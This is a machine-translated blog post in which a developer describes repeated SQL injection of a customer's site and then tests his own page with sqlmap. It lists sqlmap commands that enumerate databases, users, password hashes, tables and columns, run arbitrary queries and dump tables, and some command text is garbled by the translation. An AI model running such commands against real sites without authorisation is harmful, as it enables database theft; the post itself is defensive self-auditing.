I was hit by SQL injection.

Website injection vulnerabilities should be said to be well known by the vast majority of web developers. However, I did not expect that I was engaged in development work for 6 or 7 years, but it would be depressing. My mood is very tangled. According to my wife's words, I feel like I am in love.

The cause of the incident was that a website of an important customer was injected a few months ago, and there was no loss at the time. Only varchar or text fields with more than 100 length were found, A piece of html code has been injected, so there is no malicious damage to the content, just like an advertisement.

At that time, I did not pay attention to it, but I checked all the tables and cleared them.

However, I did not expect the database to be injected again a few weeks later. This time, I was alert. I checked most of the Code in detail and scanned the website with a set of high-price software from hp, I did find a file with potential injection risks. Then I cleared the code and fixed the problem.

After a few weeks, the database was injected again, which made me very angry. I used hp Software again to scan again. There was no problem. The server was scanned with various security software, I didn't find any problem. It was really a bit confusing, and finally I had to clear the code.

Since then, we started to pull the saw. After a few weeks, it was injected, And then I cleared it. After a few weeks, it was injected again. Even at the end of the day, I will go up from time to see if I have been injected again.

Finally, we sorted out the character type fields with a length of more than 100 characters in a table infected with only the dbo architecture.

This is a preference. Cut it.

 

Until this afternoon, I checked again and accidentally found a strange table name, dbo. pangolin_test_table. All my table names are named in the hump. Only a few tables are named using this underline. I also clear what tables and search for them by google, I ran into tears.

When I see sqlmap, the slogan: automatic SQL injection and database takeover tool on its official website (automatic SQL injection and database take over tools, I think it is more domineering to translate takeover into a take over tool .)

This time, I plan to thoroughly understand this problem, go to the website, and find information.

Sqlmap current version is 1.0, is: https://github.com/sqlmapproject/sqlmap

Sqlmap is developed with python, so you need to install the python runtime environment on the local machine, for: http://www.python.org/download/

It should be noted that sqlmap has requirements on the python version. It can only be version 2.6 or version 2.7, but cannot be used even if it is higher or lower.

After installing python, go to the decompressed directory of sqlmap and perform the following Operation tests. The specific use of sqlmap is intended to be written in another article. Here is a simple verification.

1. sqlmap. py-u "http://www.xxx.com /? Year = 2012 & month = 06 "-v 0, start to use the page to perform the injection test on the website, because it is to test your own website, so it has been OS and db, you can directly specify, to speed up the verification:

Sqlmap. py-u "http://www.xxx.com /? Year = 2012 & month = 06 "-- dbms" Microsoft SQL Server "-- OS" Windows "-v 0

The following prompt is displayed:

It means that if multiple injection points are detected, select one for injection detection, and q indicates to exit.

2. After selecting any one, wait and the following information appears:

The basic server information is listed here.

3. Continue to execute the command (-- dbs parameter indicates listing all databases on the server): sqlmap. py-u "http://www.xxx.com /? Year = 2012 & month = 06 "-- dbs

 

I am already a little scared. It's so exaggerated.

4. continue executing the command (-- users indicates listing all users): sqlmap. py-u "http://www.xxx.com /? Year = 2012 & month = 06 "-- users

Well, it's okay. You can only list the default logon username used in the current web. config string.

5. Continue to execute the command :( -- passwords, list all user passwords): sqlmap. py-u "http://www.xxx.com /? Year = 2012 & month = 06 "-- passwords

Before the execution, I felt a few trembling times. If this was the case, I was really depressed. Fortunately, I didn't get it because I set strong password verification.

 

6. Run the command (-- tables, indicating to list all the table names, dbname, you can specify a specific database): sqlmap. py-u "http://www.xxx.com /? Year = 2012 & month = 06 "-- tables-D dbname

I think it's time to urinate ..

7. Run the command (-- columns, indicating to list fields, tablename, for the specified table name): sqlmap. py-u "http://www.xxx.com /? Year = 2012 & month = 06 "-- columns-T tablename-D dbname

You sister, you have to use the manager and do nothing. You just need to use this.

 

8. Execute the command: sqlmap. py-u "http://www.xxx.com /? Year = 2012 & month = 06 "-v 1 -- SQL-query" select top 20 * from City"

I still have a query, so I have no words to update it ..

 

9. Execute the command: sqlmap. py-u "http://www.xxx.com /? Year = 2012 & month = 06 "-v 1-T tablename-D dbname -- dump

What else do you want to do is even more powerful ..

 

After this string is completed, I can't help but feel that it is very tight. Here, I once thought that I had noticed that the strong verification of integer strings and regular expressions are used to verify regular emails and mobile phone numbers, it's just a parameterized statement. For various reasons, I did not implement it completely. In addition, the actual target page is something I 've been busy with for a while, and another colleague did.

However, I did not expect it to be neglected on this small page.

Be sure to take the precaution ....

 

I used to think that I was a programmer attacking the city lion. Now I find that I must add the word "advertising company" to the front.